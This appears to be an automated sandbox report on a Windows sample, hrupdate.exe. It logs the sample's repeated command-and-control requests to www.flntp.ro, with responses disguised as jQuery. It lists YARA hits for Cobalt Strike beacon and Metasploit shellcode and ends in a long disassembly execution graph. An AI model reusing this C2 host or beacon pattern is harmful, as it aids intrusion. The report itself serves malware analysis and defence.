                                    2024-12-19 21:48:14 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                    Host: www.flntp.ro
                                    Accept-Encoding: gzip, deflate
                                    Cookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtk
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    2024-12-19 21:48:15 UTC235INHTTP/1.1 200 OK
                                    Server: nginx/1.24.0 (Ubuntu)
                                    Date: Thu, 19 Dec 2024 21:48:15 GMT
                                    Content-Type: application/javascript; charset=utf-8
                                    Content-Length: 5692
                                    Connection: close
                                    Cache-Control: max-age=0, no-cache
                                    Pragma: no-cache
                                    2024-12-19 21:48:15 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                    Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.5499813.79.209.764436664C:\Users\user\Desktop\hrupdate.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-19 21:48:28 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                    Host: www.flntp.ro
                                    Accept-Encoding: gzip, deflate
                                    Cookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtk
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    2024-12-19 21:48:29 UTC235INHTTP/1.1 200 OK
                                    Server: nginx/1.24.0 (Ubuntu)
                                    Date: Thu, 19 Dec 2024 21:48:29 GMT
                                    Content-Type: application/javascript; charset=utf-8
                                    Content-Length: 5649
                                    Connection: close
                                    Cache-Control: max-age=0, no-cache
                                    Pragma: no-cache
                                    2024-12-19 21:48:29 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                    Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.5499823.79.209.764436664C:\Users\user\Desktop\hrupdate.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-19 21:48:45 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                    Host: www.flntp.ro
                                    Accept-Encoding: gzip, deflate
                                    Cookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtk
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    2024-12-19 21:48:46 UTC235INHTTP/1.1 200 OK
                                    Server: nginx/1.24.0 (Ubuntu)
                                    Date: Thu, 19 Dec 2024 21:48:46 GMT
                                    Content-Type: application/javascript; charset=utf-8
                                    Content-Length: 5649
                                    Connection: close
                                    Cache-Control: max-age=0, no-cache
                                    Pragma: no-cache
                                    2024-12-19 21:48:46 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                    Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:16:45:40
                                    Start date:19/12/2024
                                    Path:C:\Users\user\Desktop\hrupdate.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\hrupdate.exe"
                                    Imagebase:0x670000
                                    File size:244'224 bytes
                                    MD5 hash:03B14E9338A1C9E5551F9450207F6D84
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.3867809207.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.3867809207.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.3897384147.00000000046CE000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.3897384147.00000000046CE000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.3896833882.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.3896833882.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:false

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:8.8%
                                      Dynamic/Decrypted Code Coverage:85.4%
                                      Signature Coverage:11.4%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:49
                                      execution_graph 20644 671a20 20645 671a31 20644->20645 20646 671adf EndDialog 20644->20646 20647 671ac2 SetTimer 20645->20647 20648 671a3c 20645->20648 20649 671a41 20648->20649 20650 671a49 GetDlgItem SendMessageW 20648->20650 20651 671aa5 SendMessageW 20650->20651 20652 671a6f KillTimer KiUserCallbackDispatcher DialogBoxParamW 20650->20652 17768 469f638 17769 469f6f7 17768->17769 17773 469f64e 17768->17773 17909 46a1283 17769->17909 17771 469f653 17772 469f6ff 17772->17771 17773->17771 17774 469f6da 17773->17774 17787 46a35e2 17773->17787 17832 46944e1 17774->17832 17778 469f69c 17780 469f6a9 17778->17780 17781 469f6ba 17778->17781 17779 469f6df 17779->17774 17818 46a3540 17779->17818 17780->17774 17783 469f6b1 HeapDestroy 17780->17783 17803 46a2b72 17781->17803 17783->17774 17786 46a2b72 73 API calls 17786->17774 17788 46a35ee 17787->17788 17789 46a35f5 17788->17789 17793 46a3640 17788->17793 17943 469a042 17789->17943 17790 46a36c5 VirtualQuery 17802 469f68b 17790->17802 17792 46a3602 17794 469a042 66 API calls 17792->17794 17793->17790 17795 46a3673 GetCurrentProcess 17793->17795 17796 46a3690 GetCurrentProcess 17793->17796 17797 46a3615 17794->17797 17798 46a368d 17795->17798 17796->17798 17799 469a042 66 API calls 17797->17799 17798->17790 17798->17802 17800 46a3625 17799->17800 17950 4699f1a 17800->17950 17802->17774 17802->17778 17802->17779 17804 46a2b80 17803->17804 17805 46a2bc9 17804->17805 17806 46a2b87 17804->17806 17808 46a2c54 VirtualFree 17805->17808 17810 46a2bf7 GetCurrentProcess 17805->17810 17807 469a042 66 API calls 17806->17807 17809 46a2b93 17807->17809 17817 469f6c8 17808->17817 17811 469a042 66 API calls 17809->17811 17812 46a2c0f 17810->17812 17813 46a2ba1 17811->17813 17812->17808 17812->17817 17814 469a042 66 API calls 17813->17814 17815 46a2baf 17814->17815 17816 4699f1a 71 API calls 17815->17816 17816->17817 17817->17774 17817->17786 17819 46a354a 17818->17819 17820 46a354f 17819->17820 17821 46a3573 17819->17821 17822 469a042 66 API calls 17820->17822 17823 46a35d7 UnmapViewOfFile 17821->17823 17825 46a3590 17821->17825 17827 46a35c5 GetCurrentProcess 17821->17827 17824 46a355e 17822->17824 17823->17774 17826 4699f1a 71 API calls 17824->17826 17825->17823 17829 46a359e GetCurrentProcess 17825->17829 17828 46a356d 17826->17828 17830 46a35bc 17827->17830 17828->17774 17829->17830 17830->17823 17831 46a35c2 17830->17831 17831->17774 18362 469cf5f 17832->18362 17834 46944f4 18369 46a1bb6 17834->18369 17840 46945e6 17841 46a4b98 71 API calls 17840->17841 17842 46945f9 17841->17842 18396 4697dcf 17842->18396 17844 4694601 17845 4694605 17844->17845 17847 469460a 17844->17847 18518 46a3f47 17845->18518 17848 469461f 17847->17848 17849 4694624 17847->17849 17850 46a3f47 165 API calls 17848->17850 18401 4697e2d 17849->18401 17850->17849 17853 469462d 17855 46a3f47 165 API calls 17853->17855 17854 4694632 18407 4697eeb 17854->18407 17855->17854 17858 469463b 17859 46a3f47 165 API calls 17858->17859 17860 4694640 17859->17860 17861 46aea1b _malloc 66 API calls 17860->17861 17862 4694666 17861->17862 17863 4694670 17862->17863 17864 4694675 17862->17864 17865 46a3f47 165 API calls 17863->17865 17866 46a4b98 71 API calls 17864->17866 17865->17864 17867 469468a 17866->17867 18419 469ce03 GetACP GetOEMCP 17867->18419 17869 469469c 18456 46a4ddd 17869->18456 17872 46946bb GetLocalTime 17873 46946da 17872->17873 17874 46946db 17873->17874 17875 4694705 GetLocalTime 17874->17875 17877 4694725 17874->17877 17876 4694724 17875->17876 17876->17877 17878 4694754 GetLocalTime 17877->17878 17879 4694774 17877->17879 17880 4694773 17878->17880 18460 4699d58 17879->18460 17880->17879 17882 469499c 17884 46a3f47 165 API calls 17882->17884 17886 46949a6 17884->17886 17885 46aeb76 102 API calls __snprintf 17896 469477e 17885->17896 17886->17771 17893 4697dcf GetLocalTime 17893->17896 17895 46a3f47 165 API calls 17895->17896 17896->17882 17896->17885 17896->17893 17897 46948aa 17896->17897 17900 46aec25 GetSystemTimeAsFileTime __time64 17896->17900 18464 46a1f91 17896->18464 18470 4696c3f 17896->18470 18481 469729c 17896->18481 18489 46a2038 17896->18489 18496 469dd89 17896->18496 18506 469747c 17896->18506 18509 4699aae 17896->18509 18544 469ab4c 17896->18544 18558 46a0b15 17896->18558 18576 469f190 17896->18576 17897->17895 17897->17896 17898 46a3f47 165 API calls 17897->17898 17905 4697dcf GetLocalTime 17897->17905 17907 4696c3f 78 API calls 17897->17907 18580 469957b 17897->18580 18588 469c5f5 17897->18588 18594 469bb3d 17897->18594 18607 4697424 17897->18607 18610 4696db9 17897->18610 17898->17896 17900->17896 17905->17897 17907->17897 17910 469cf5f 66 API calls 17909->17910 17911 46a1296 _memset 17910->17911 20521 46a175d 17911->20521 17913 46a12f9 17914 46aea1b _malloc 66 API calls 17913->17914 17915 46a12ff _memset 17914->17915 17916 46a4b98 71 API calls 17915->17916 17917 46a1321 17916->17917 20528 46a1871 17917->20528 17919 46a1329 17920 46aea1b _malloc 66 API calls 17919->17920 17921 46a1334 _memset 17920->17921 17922 46a4b98 71 API calls 17921->17922 17923 46a1356 17922->17923 17924 46a1380 17923->17924 17925 4697388 71 API calls 17923->17925 17927 46a13ce GetComputerNameExA 17924->17927 17928 46a13ec 17924->17928 17926 46a1370 htonl 17925->17926 17926->17924 20535 46a121e 17927->20535 17930 46a1419 17928->17930 17931 46a13fd GetComputerNameA 17928->17931 17933 46a142a GetUserNameA 17930->17933 17935 46a1449 _memcpy_s 17930->17935 17932 46a121e 101 API calls 17931->17932 17932->17930 17934 46a121e 101 API calls 17933->17934 17934->17935 17936 46a157b 17935->17936 17939 469d036 htons 17935->17939 17940 469cff3 htonl 17935->17940 17941 46aea1b _malloc 66 API calls 17935->17941 17942 46a4b98 71 API calls 17935->17942 17937 469cfaa 66 API calls 17936->17937 17938 46a1583 _memset 17937->17938 17938->17772 17939->17935 17940->17935 17941->17935 17942->17935 17960 46aea1b 17943->17960 17946 46aea1b _malloc 66 API calls 17947 469a0a4 17946->17947 17948 469a06e _memcpy_s 17947->17948 17978 46ae93e 17947->17978 17948->17792 17951 4699f40 17950->17951 17952 46aea1b _malloc 66 API calls 17951->17952 17956 4699fc2 _memset _memcpy_s 17951->17956 17955 4699f60 _memset 17952->17955 17953 469a03a 17953->17802 17954 46ae93e 66 API calls __getstream 17954->17956 17955->17956 18328 4699edf 17955->18328 17956->17953 17956->17954 17958 4699faf _memset 17959 46ae93e __getstream 66 API calls 17958->17959 17959->17956 17961 46aeace 17960->17961 17967 46aea2d 17960->17967 17962 46b1f4f _realloc 6 API calls 17961->17962 17963 46aead4 17962->17963 17965 46b0e0c _calloc 65 API calls 17963->17965 17966 469a04d 17965->17966 17966->17946 17966->17948 17967->17966 17970 46aea8a RtlAllocateHeap 17967->17970 17971 46aea3e 17967->17971 17973 46aeaba 17967->17973 17976 46aeabf 17967->17976 18037 46ae9cc 17967->18037 18045 46b1f4f 17967->18045 17970->17967 17971->17967 17991 46b1f07 17971->17991 18000 46b1d5c 17971->18000 18034 46af061 17971->18034 18048 46b0e0c 17973->18048 17977 46b0e0c _calloc 65 API calls 17976->17977 17977->17966 17979 46ae94a __fsopen 17978->17979 17980 46ae989 17979->17980 17981 46ae9c3 __fsopen _realloc 17979->17981 17982 46b1075 __lock 64 API calls 17979->17982 17980->17981 17983 46ae99e HeapFree 17980->17983 17981->17948 17988 46ae961 ___sbh_find_block 17982->17988 17983->17981 17984 46ae9b0 17983->17984 17985 46b0e0c _calloc 64 API calls 17984->17985 17986 46ae9b5 GetLastError 17985->17986 17986->17981 17987 46ae97b 18324 46ae994 17987->18324 17988->17987 18318 46b10d8 17988->18318 18051 46b86f3 17991->18051 17994 46b1d5c __NMSG_WRITE 66 API calls 17996 46b1f33 17994->17996 17995 46b86f3 __set_error_mode 66 API calls 17997 46b1f1b 17995->17997 17998 46b1d5c __NMSG_WRITE 66 API calls 17996->17998 17997->17994 17999 46b1f3d 17997->17999 17998->17999 17999->17971 18001 46b1d70 18000->18001 18002 46b86f3 __set_error_mode 63 API calls 18001->18002 18033 46b1ecb 18001->18033 18003 46b1d92 18002->18003 18004 46b1ed0 GetStdHandle 18003->18004 18006 46b86f3 __set_error_mode 63 API calls 18003->18006 18005 46b1ede _strlen 18004->18005 18004->18033 18009 46b1ef7 WriteFile 18005->18009 18005->18033 18007 46b1da3 18006->18007 18007->18004 18008 46b1db5 18007->18008 18008->18033 18074 46b868b 18008->18074 18009->18033 18012 46b1deb GetModuleFileNameA 18014 46b1e09 18012->18014 18020 46b1e2c _strlen 18012->18020 18016 46b868b _strcpy_s 63 API calls 18014->18016 18018 46b1e19 18016->18018 18017 46b1e6f 18099 46b84ce 18017->18099 18019 46b2ccf __invoke_watson 10 API calls 18018->18019 18018->18020 18019->18020 18020->18017 18090 46b8542 18020->18090 18025 46b1e93 18026 46b84ce _strcat_s 63 API calls 18025->18026 18028 46b1ea7 18026->18028 18027 46b2ccf __invoke_watson 10 API calls 18027->18025 18030 46b1eb8 18028->18030 18031 46b2ccf __invoke_watson 10 API calls 18028->18031 18029 46b2ccf __invoke_watson 10 API calls 18029->18017 18108 46b8365 18030->18108 18031->18030 18033->17971 18159 46af036 GetModuleHandleW 18034->18159 18038 46ae9d8 __fsopen 18037->18038 18039 46aea09 __fsopen 18038->18039 18162 46b1075 18038->18162 18039->17967 18041 46ae9ee 18169 46b1887 18041->18169 18046 46b03d1 __decode_pointer 6 API calls 18045->18046 18047 46b1f5f 18046->18047 18047->17967 18237 46b05a4 GetLastError 18048->18237 18050 46b0e11 18050->17976 18052 46b8702 18051->18052 18053 46b0e0c _calloc 66 API calls 18052->18053 18054 46b1f0e 18052->18054 18055 46b8725 18053->18055 18054->17995 18054->17997 18057 46b2df7 18055->18057 18060 46b03d1 TlsGetValue 18057->18060 18059 46b2e07 __invoke_watson 18061 46b040a GetModuleHandleW 18060->18061 18062 46b03e9 18060->18062 18064 46b041a 18061->18064 18065 46b0425 GetProcAddress 18061->18065 18062->18061 18063 46b03f3 TlsGetValue 18062->18063 18068 46b03fe 18063->18068 18070 46aefdd 18064->18070 18067 46b0402 18065->18067 18067->18059 18068->18061 18068->18067 18071 46aefe8 Sleep GetModuleHandleW 18070->18071 18072 46af00a 18071->18072 18073 46af006 18071->18073 18072->18065 18072->18067 18073->18071 18073->18072 18075 46b869c 18074->18075 18078 46b86a3 18074->18078 18075->18078 18081 46b86c9 18075->18081 18076 46b0e0c _calloc 66 API calls 18077 46b86a8 18076->18077 18079 46b2df7 __fsopen 6 API calls 18077->18079 18078->18076 18080 46b1dd7 18079->18080 18080->18012 18083 46b2ccf 18080->18083 18081->18080 18082 46b0e0c _calloc 66 API calls 18081->18082 18082->18077 18135 46b6750 18083->18135 18085 46b2cfc IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18086 46b2dd8 GetCurrentProcess TerminateProcess 18085->18086 18087 46b2dcc __invoke_watson 18085->18087 18137 46b655e 18086->18137 18087->18086 18089 46b1de8 18089->18012 18094 46b8554 18090->18094 18091 46b8558 18092 46b1e5c 18091->18092 18093 46b0e0c _calloc 66 API calls 18091->18093 18092->18017 18092->18029 18098 46b8574 18093->18098 18094->18091 18094->18092 18096 46b859e 18094->18096 18095 46b2df7 __fsopen 6 API calls 18095->18092 18096->18092 18097 46b0e0c _calloc 66 API calls 18096->18097 18097->18098 18098->18095 18100 46b84e6 18099->18100 18102 46b84df 18099->18102 18101 46b0e0c _calloc 66 API calls 18100->18101 18107 46b84eb 18101->18107 18102->18100 18105 46b851a 18102->18105 18103 46b2df7 __fsopen 6 API calls 18104 46b1e82 18103->18104 18104->18025 18104->18027 18105->18104 18106 46b0e0c _calloc 66 API calls 18105->18106 18106->18107 18107->18103 18146 46b03c8 18108->18146 18111 46b8388 LoadLibraryA 18112 46b839d GetProcAddress 18111->18112 18114 46b84b2 18111->18114 18113 46b83b3 18112->18113 18112->18114 18149 46b0356 TlsGetValue 18113->18149 18114->18033 18115 46b8465 18118 46b03d1 __decode_pointer 6 API calls 18115->18118 18116 46b03d1 __decode_pointer 6 API calls 18120 46b842d 18116->18120 18118->18114 18119 46b03d1 __decode_pointer 6 API calls 18128 46b847d 18119->18128 18122 46b03d1 __decode_pointer 6 API calls 18120->18122 18126 46b843a 18122->18126 18123 46b0356 __encode_pointer 6 API calls 18124 46b83ce GetProcAddress 18123->18124 18125 46b0356 __encode_pointer 6 API calls 18124->18125 18127 46b83e3 GetProcAddress 18125->18127 18126->18115 18126->18119 18129 46b0356 __encode_pointer 6 API calls 18127->18129 18128->18115 18130 46b03d1 __decode_pointer 6 API calls 18128->18130 18131 46b83f8 18129->18131 18130->18115 18132 46b8402 GetProcAddress 18131->18132 18134 46b8410 18131->18134 18133 46b0356 __encode_pointer 6 API calls 18132->18133 18133->18134 18134->18116 18134->18126 18136 46b675c __VEC_memzero 18135->18136 18136->18085 18138 46b6568 IsDebuggerPresent 18137->18138 18139 46b6566 18137->18139 18145 46b8a25 18138->18145 18139->18089 18142 46ba37f SetUnhandledExceptionFilter UnhandledExceptionFilter 18143 46ba3a4 GetCurrentProcess TerminateProcess 18142->18143 18144 46ba39c __invoke_watson 18142->18144 18143->18089 18144->18143 18145->18142 18147 46b0356 __encode_pointer 6 API calls 18146->18147 18148 46b03cf 18147->18148 18148->18111 18148->18134 18150 46b038f GetModuleHandleW 18149->18150 18151 46b036e 18149->18151 18153 46b03aa GetProcAddress 18150->18153 18154 46b039f 18150->18154 18151->18150 18152 46b0378 TlsGetValue 18151->18152 18158 46b0383 18152->18158 18156 46b0387 GetProcAddress 18153->18156 18155 46aefdd __crt_waiting_on_module_handle 2 API calls 18154->18155 18157 46b03a5 18155->18157 18156->18123 18157->18153 18157->18156 18158->18150 18158->18156 18160 46af04a GetProcAddress 18159->18160 18161 46af05a ExitProcess 18159->18161 18160->18161 18163 46b108a 18162->18163 18164 46b109d RtlEnterCriticalSection 18162->18164 18178 46b0fb2 18163->18178 18164->18041 18166 46b1090 18166->18164 18204 46af00d 18166->18204 18172 46b18b5 18169->18172 18170 46b194e 18174 46ae9f9 18170->18174 18232 46b149e 18170->18232 18172->18170 18172->18174 18225 46b13ee 18172->18225 18175 46aea12 18174->18175 18236 46b0f9b RtlLeaveCriticalSection 18175->18236 18177 46aea19 18177->18039 18179 46b0fbe __fsopen 18178->18179 18180 46b0fe4 18179->18180 18181 46b1f07 __FF_MSGBANNER 66 API calls 18179->18181 18186 46b0ff4 __fsopen 18180->18186 18211 46b79cd 18180->18211 18182 46b0fd3 18181->18182 